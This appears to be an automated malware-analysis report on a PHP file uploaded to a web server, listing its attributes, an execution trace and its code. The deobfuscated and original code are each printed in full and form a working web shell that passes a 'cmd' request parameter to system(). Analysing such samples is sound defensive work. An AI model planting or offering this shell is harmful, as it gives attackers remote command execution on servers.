PHP Malware Analysis
00000000a.php
md5: b0df95dfd3b02adb0f55b22039af75e5
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Title
- Document (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="GET" name="<?php
echo basename($_SERVER['PHP_SELF']);
?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>Execution traces
data/traces/b0df95dfd3b02adb0f55b22039af75e5_trace-1676245405.1477.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:43:51.045572]
1 0 1 0.000205 393528
1 3 0 0.000273 395376 {main} 1 /var/www/html/uploads/00000000a.php 0 0
2 4 0 0.000295 395376 basename 0 /var/www/html/uploads/00000000a.php 12 1 '/uploads/00000000a.php'
2 4 1 0.000318 395448
2 4 R '00000000a.php'
1 3 1 0.000338 395376
0.000370 314240
TRACE END [2023-02-12 21:43:51.045775]
Generated HTML code
<html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="GET" name="00000000a.php">
<input type="TEXT" name="cmd" autofocus="" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre> </pre>
</body></html>Original PHP code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>